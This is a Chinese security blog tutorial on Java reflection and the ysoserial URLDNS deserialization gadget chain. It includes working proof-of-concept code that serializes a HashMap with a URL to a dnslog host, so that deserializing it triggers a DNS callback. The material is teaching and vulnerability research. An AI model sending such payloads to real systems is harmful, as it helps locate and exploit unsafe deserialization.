打算学习cc链的知识,一边记笔记,一边分析出来,大家可以一起学习。
我参考的视频是 B站的 白日梦组长
在安全中,java反射起到很大的作用。
让java具有动态性修改已有对象的属性动态生成对象动态调用方法操作内部类和私有方法在反序列化中定制需要的对象通过invoke调用除了同名函数以外的函数通过class类创建对象,引入不能序列化的类
讲之前呢,先带大家过一遍反射的知识点,有助于理解。
內存:即JVM内存,栈、堆、方法区啥的都是JVM内存
class文件:就是所谓的字节码文件,这里直观些成为 .class 文件
java源代码执行后,会生成.class 文件 俗称字节码文件,会把里面的变量,方法之类的数据,加载到内存里,new对象 就开辟一个空间存储数据,子类调用父类构造器,构造器执行代码块,初始化语句啥的,大家自行百度 不会了
Student学生类
package file;import java.util.Objects;public class Student {private String name;private int age;public String hitger;public String weighter;public String a;protected String b;String c;private String d;public Student(){}public String getName() {return name;}public void setName(String name) {this.name = name;}public int getAge() {return age;}public void setAge(int age) {this.age = age;}public Student(String name, int age) {this.name = name;this.age = age;}public void eat(){System.out.println("猫 吃 🐟");}public void eat(String food){System.out.println("猫 吃 🐟"+food);}public String toString() {return "Student{" +"name='" + name + ''' +", age=" + age +", hitger='" + hitger + ''' +", weighter=" + weighter +", a='" + a + ''' +", b='" + b + ''' +", c='" + c + ''' +", d='" + d + ''' +'}';}// 重写hashcode 和equalspublic boolean equals(Object o) {if (this == o) return true;if (o == null || getClass() != o.getClass()) return false;Student student = (Student) o;return age == student.age && Objects.equals(name, student.name);}public int hashCode() {return Objects.hash(name, age);}}
获取class对象三种方式
// 多用于配置文件 读取文件 加载类Class.forName("包名.类名") 将字节码文件加载到内容,返回class对象// 多用于参数的传递类名.class 通过类型class 返回属性// 多用于对象的获取字节码的方式对象.getClass
import file.CopyFile;import file.Student;public class Demo1 {public static void main(String[] args) throws Exception {// class.fornameClass<?> cls = Class.forName("file.CopyFile");System.out.println(cls);// 类名.classClass<CopyFile> cls1 = CopyFile.class;System.out.println(cls1);// 对象.getClassStudent s = new Student();Class<? extends Student> cls2 = s.getClass();System.out.println(cls2);}}
常用方法
获取成员变量们getFields() 获取所有public修饰的成员变量getField(String name) 获取指定名称的public修饰的成员变量获取值 get()修改值 set()getDeclaredField(String name) 获取单个成员变量setAccessible 暴力反射getDeclaredFields() 获取所有的成员变量 不考虑修饰符获取构造方法们作用 创建对象 newInstance()getConstructors()getConstructor(类<?> type) 构造方法 单个获取成员方法们作用 执行方法 invoke()获取方法名 getName()getMethods()getMethond(String name,类<?> type)获取类名称getName()
获取成员变量
import file.Student;import java.lang.reflect.Field;public class Demo2 {public static void main(String[] args) throws Exception {Student s = new Student();// 获取class对象Class<? extends Student> cls = s.getClass();// 获取所有成员变量Field[] fields = cls.getFields();for (Field field : fields) {System.out.println(field);}// 获取单个成员变量Field w = cls.getField("weighter");System.out.println(w);// 获取成员变量的数值 修改Object o = w.get(s);System.out.println(o);w.set(s,"李四");System.out.println(s);// 获取所有的成员变量Field[] df = cls.getDeclaredFields();for (Field f : df) {System.out.println(f);}// 获取单个成员变量 获取值 修改值Field dd = cls.getDeclaredField("d");// 取消修饰符安全型考虑 俗称暴力反射dd.setAccessible(true);Object vaule = dd.get(s);System.out.println(vaule);dd.set(s,"谁tm买小米");System.out.println(s);}}
获取构造方法
import file.Student;import java.lang.reflect.Constructor;public class Demo3 {public static void main(String[] args) throws Exception{Student s = new Student();// 反射Class cls = s.getClass();// 获取单个构造方法Constructor con = cls.getConstructor(String.class, int.class);System.out.println(con);// 创建对象Object obj = con.newInstance("张三", 30);System.out.println(obj);}}
获取成员方法
import file.Student;import java.lang.reflect.Method;public class Demo4 {public static void main(String[] args) throws Exception{Student s = new Student();// 反射Class<? extends Student> cls = s.getClass();// 获取无参方法Method cat_methond1 = cls.getMethod("eat");// 执行方法cat_methond1.invoke(s);// 获取有参方法Method eat_methnd2 = cls.getMethod("eat", String.class);eat_methnd2.invoke(s,"和猫粮");// 获取所有public修饰的方法Method[] methods = cls.getMethods();for (Method m : methods) {// 遍历方法System.out.println(m);// 遍历方法名System.out.println(m.getName());}// 获取类方法名String name = cls.getName();System.out.println(name);}}
涉及cc链 就会涉及到序列化相关知识,很早之前写了一篇,可以参考下
URLDNS链分析
先从最简单的链条开始分析,因为简单,难的我暂时也不会
https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java
调用链如下
简单来说,就是代码中,层层调用类。
什么意思:
比如 写一个工具类,每次都写重复的代码,很繁琐,把相同的逻辑代码 抽出来,单独写到一个文件里,如,HttpClinet.java 这里写了jdbc连接数据的流程,我下次在连接数据库,直接调用HttpClinet.connet 直接一两行就完成了。
* Gadget Chain:* HashMap.readObject()* HashMap.putVal()* HashMap.hash()* URL.hashCode()
github作者翻译:作为反序列化的一部分,HashMap会对它调用的每个键调用hashCode*反序列化,因此使用Java URL对象作为序列化键允许*它会触发DNS查找。
在java中 有很多泛型(数据类型) hashMap最常见 翻冰蝎,哥斯拉 这些源码时,也会经常看到这种泛型。
在java安全中, hashMap + 反序列化 + 反射 === 无敌
hashMap 最关键的就是它的泛型,可以是String,Integer,又或者Object,包括自己写的 Person Student 类
那么 cc 链 是和 反序列化挂钩的,像shiro 反序列化,fastjson反序列化等等
创建了小demo 演示 反序列化的过程 代码写注释了 就不过多解释,早期发过一次java反序列化学习 可以看下
import java.io.Serializable;// 创建person类 实现反序列化接口 不继承接口 就无法对数据序列化操作public class Person implements Serializable {private String name;private int age;public Person(){}public Person(String name, int age) {this.name = name;this.age = age;}public String getName() {return name;}public void setName(String name) {this.name = name;}public int getAge() {return age;}public void setAge(int age) {this.age = age;}public String toString() {return "Persin{" +"name='" + name + ''' +", age=" + age +'}';}}
import java.io.FileOutputStream;import java.io.ObjectOutputStream;public class SerializableTest {// 创建序列化方法 创建一个bin文件 存储序列化后的数据public static void serializable(Object obj) throws Exception {ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));oos.writeObject(obj);}public static void main(String[] args) throws Exception {// 创建person对象Person person = new Person("张三", 23);// 实现序列化方法serializable(person);}}
import java.io.FileInputStream;import java.io.ObjectInputStream;public class UnSerializableTest {// 创建反序列化方法 传参一个文件 读取文件内容 返回给 obj 对象public static Object Unserializable(String Filename) throws Exception {ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));Object obj = ois.readObject();return obj;}public static void main(String[] args) throws Exception {// 反序列化操作,类型强制类型转换Person person = (Person) Unserializable("ser.bin");System.out.println(person);}}
如果说,我在序列化步骤中,添加了命令执行的代码,就会产生rce漏洞。
回到上一步,接着讲urldns利用链
HashMap会对它调用的每个键调用hashCode
使用Java URL对象作为序列化键允许
ctrl + 左键 可以查看源代码
查看hashMap源码 他实现了序列化的接口 当我们存储数据 需要使用put方法
查看put 源代码 调用hash方法 点进去 key调用了hashCode方法
接着看URL 他也调用了hashCode 方法
在hashmap中 key也会调用hashcode方法 所以这就形成了一条调用链
HashMap -> implements Serializable 实现序列化接口hashMap.put -> hash -> key.hashCode == url(key).hashCode
这样写不知道你们能不能理解,,,
就是说,创建一个HashMap泛型,在创建一个url连接,使用put方法把url数据存放到里面,这个hashmap 实现了序列化方法,那么它里面的数据都可以被序列化,使用put后,会把url当作一条数据,传给hash方法,它就去调用hashCode放,这个url就是一个key ,这个key 调用了hashCode,这个key原本就是URL 方法创建的,所以查看URL源代码 就明白为什么会有HashCode方法了。
代码实现下,看看dnslog会不会有数据
import java.io.FileOutputStream;import java.io.ObjectOutputStream;import java.net.URL;import java.util.HashMap;public class SerializableTest {public static void serializable(Object obj) throws Exception {ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));oos.writeObject(obj);}public static void main(String[] args) throws Exception {// Person person = new Person("张三", 23);// 创建hashmap泛型HashMap<URL,Integer> hashMap = new HashMap<>();// 创建一个url资源URL url = new URL("http://mvkn4u.ceye.io");// 存放url数据hashMap.put(url,1);serializable(hashMap);}}
虽然成功了但是存在问题的,打个断点,我们看看
使用 put后存放数据 hashCode 就变成了-1 就会造成 我还没有序列化 就已经执行了请求dns的操作了。
为了修改这个问题,所以引入了反射机制。利用反射 把hashcode 改成其他值 让他在put这一步变成其他值。
import java.io.FileOutputStream;import java.io.ObjectOutputStream;import java.lang.reflect.Field;import java.net.URL;import java.util.HashMap;public class SerializableTest {public static void serializable(Object obj) throws Exception {ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));oos.writeObject(obj);}public static void main(String[] args) throws Exception {// Person person = new Person("张三", 23);// 创建hashmap泛型HashMap<URL,Integer> hashMap = new HashMap<>();// 创建一个url资源URL url = new URL("http://mvkn4u.ceye.io");// 获取url 字节码文件Class c = url.getClass();// hashCode 是私有变量 使用setAccessible强制修改Field hashcodefied = c.getDeclaredField("hashCode");hashcodefied.setAccessible(true);hashcodefied.set(url,123);hashMap.put(url,1);hashcodefied.set(url,-1);serializable(hashMap);}}
执行序列化后 没有收到dns请求,反序列化打断点后查看hashCode值
执行反序列化后 成功收到请求
今天的内容分享完毕,期待大佬们投稿~
原文始发于微信公众号(轩公子谈技术):Java无所不能的反射-URLDNS链分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论